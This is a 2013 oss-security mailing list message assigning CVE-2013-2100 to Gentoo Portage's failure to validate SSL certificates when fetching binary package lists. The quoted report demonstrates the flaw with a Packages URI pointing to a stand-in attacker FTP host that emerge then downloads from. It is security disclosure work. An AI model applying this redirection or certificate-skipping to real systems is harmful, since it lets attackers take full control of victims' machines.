Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 15 May 2013 19:45:39 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: "Jason A. Donenfeld" <Jason@...c4.com>,
        Gentoo Security <security@...too.org>, zx2c4@...too.org
Subject: Re: CVE Request: Man in the middle on Gentoo Portage
 binary package installer

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 05/15/2013 04:46 AM, Jason A. Donenfeld wrote:
> Hi Kurt,
> 
> Portage is the package manager of Gentoo Linux. It supports many 
> features, one of which is the ability to synchronize against a
> remote list of binary packages, and use that list to determine
> where to fetch such binary packages. One of the fields in this list
> of packages is URI:
> 
> victim # curl -s -k https://portage-build.zx2c4.com/Packages | grep
> URI: URI: ftp://horrible.attacker.somewhere.on.the.internet/blah
> 
> victim # emerge -1 portage-utils Calculating dependencies... done!
> 
>>>> Emerging binary (1 of 1) app-portage/portage-utils-0.30 from
>>>> gentoo
> --2013-05-15 12:33:32-- 
> ftp://horrible.attacker.somewhere.on.the.internet/blah/app-portage/portage-utils-0.30.tbz2
>
> 
=> ‘/usr/portage/packages/app-portage/portage-utils-0.30.tbz2’
> Resolving horrible.attacker.somewhere.on.the.internet...
> 
> Over insecure connections, Portage provides the ability to use
> HTTPS (in addition to SFTP and SSH), so that this remote list of
> binary packages is not tampered with. This list of binary packages
> will be downloaded in the background silently. Unfortunately,
> Portage does not validate the SSL certificates, leaving this open
> to a trivial man in the middle attack. An attacker could leverage
> this man in the middle vector to remotely gain complete control
> over a victim's machine, since Portage runs with essentially full
> permissions.
> 
> I reported this to the maintainer of Portage in Gentoo Bug #469888 
> [1], and it was fixed in commit b5969af9f5 [2].
> 
> Do note that while this commit solves the immediate problem with 
> fetching /Packages, as detailed above, there may be other
> additional unconfirmed insecure uses of the vulnerable urlopen()
> function that have not yet been analyzed or fixed.
> 
> Thanks, Jason
> 
> 
> [1] https://bugs.gentoo.org/show_bug.cgi?id=469888 [2]
> http://git.overlays.gentoo.org/gitweb/?p=proj/portage.git;a=commit;h=b5969af9f575e4e4b669f44e76ad01f0dbc2dd27
>
> 
Yeah SSL with no certificate checks is not so good.

Please use CVE-2013-2100 for this issue.


- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRlDpCAAoJEBYNRVNeJnmTZIMQANMmQfww+/2TTShIa3AcO9sS
S6KnC2w40Q8eRza+8rMMWQ0w91e+vhQuQ09Zyl02xWctSE6WvlM/jtZTHKwjY4lh
q2pxkSdMecTbNANtfkaIlU5rsWiROuGbvb33ITwjJNvONVGPh9+kx/xccRqodHc2
hlb9jhdKlZSVEUgIeCCBDTWGZnwbQF3CK9tFMWJGj6lTdOaqCiM04whfHmX9urje
6Fj0vLW1VbbGmFQZbIJajGzwNZQvwlNN9/5kn5nWE6WzfqXwxmj1NpuVlnFSpU83
0jeWEdbA0b7mKkDiBryuo5eRtJmdAHxpe+Mvqin/d+pXRLX7qbvpY2IlXTQR2U/u
jtmO943UR+nRHdItAX0VPG6ua4AEecnqgUTYymMrt4344u8I3RoLwjxDGmmZyThV
0i84orR8rbdawQOUWUIjkrK9n/fPHDJ3QBdegZ5Na3nyGGdXSiApFzaxcfKmpVDe
4SzcNVghPQNj5mEappBTIPO5KdPF6FIQxWcj9/a6M9bVwJEyd4gZVTgQmGLAwHgQ
jKdmWzh/hBwm+RTfgJMZI0nJmydUCFlGgd5PAFkMY7VY1lvbbaEEYQPdDE1mtHL1
60cB38PYBL5Thf25FqV+7cpjZTglOyDJsylPgHG3B6M5SDJXmKxgvnaJAW3+zpmQ
y/dM0r9LeQu5MhPhsdeC
=JhKw
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.